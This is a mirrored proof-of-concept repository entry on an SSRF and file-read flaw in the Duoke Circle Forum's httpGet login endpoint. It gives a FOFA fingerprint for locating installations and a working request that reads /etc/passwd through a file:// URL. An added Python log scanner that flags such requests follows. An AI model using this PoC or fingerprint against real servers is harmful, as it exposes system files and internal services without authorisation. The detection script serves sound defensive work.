mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
476 B
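多客圈子论坛 (Duoke Circle Forum) front-end SSRF vulnerability
In the /app/api/controller/Login.php controller, the httpGet method calls curl_exec with a caller-controlled parameter, which leads to arbitrary file read and SSRF.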
fofa
"/static/index/js/jweixin-1.2.0.js"
poc
/index.php/api/login/httpGet?url=file:///etc/passwd
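A log check for the request shape shown in the PoC, added here as an example and not part of the original repository: it flags requests to the httpGet endpoint whose url parameter uses a non-HTTP scheme or names a loopback, private or link-local address. The combined access-log format, the case-insensitive path match and the sample lines are assumptions constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint from the PoC on this page; case-insensitive matching is an assumption.
ENDPOINT = re.compile(r"/api/login/httpget", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/May/2025:10:01:02 +0000] "GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1" 200 1532',
    '203.0.113.7 - - [05/May/2025:10:01:09 +0000] "GET /index.php/api/login/httpGet?url=http%3A%2F%2F127.0.0.1%2F HTTP/1.1" 200 211',
    '198.51.100.4 - - [05/May/2025:10:02:00 +0000] "GET /index.php/api/login/httpGet?url=https://api.example.com/v1/token HTTP/1.1" 200 88',
]

def classify_target(url):
    """Return why a url= value is suspicious, or None if it looks like a normal fetch."""
    try:
        parts = urlsplit(url.strip())
        host = parts.hostname or ""
    except ValueError:
        return "unparseable URL"
    if parts.scheme.lower() not in ("http", "https"):
        return f"non-HTTP scheme {parts.scheme!r}"
    if host == "localhost" or host.endswith(".localhost"):
        return "loopback hostname"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # DNS name: it has to be resolved and re-checked at fetch time
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return f"internal address {ip}"
    return None

def scan(lines):
    """Return (line_no, url_value, reason) for each suspicious httpGet request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not ENDPOINT.search(path):
            continue
        for value in parse_qs(query).get("url", []):  # parse_qs percent-decodes once
            reason = classify_target(value)
            if reason:
                findings.append((n, value, reason))
    return findings
```

Hostnames that are not IP literals pass this check unexamined, so it complements, rather than replaces, restricting the schemes and destinations the server-side fetch is allowed to use.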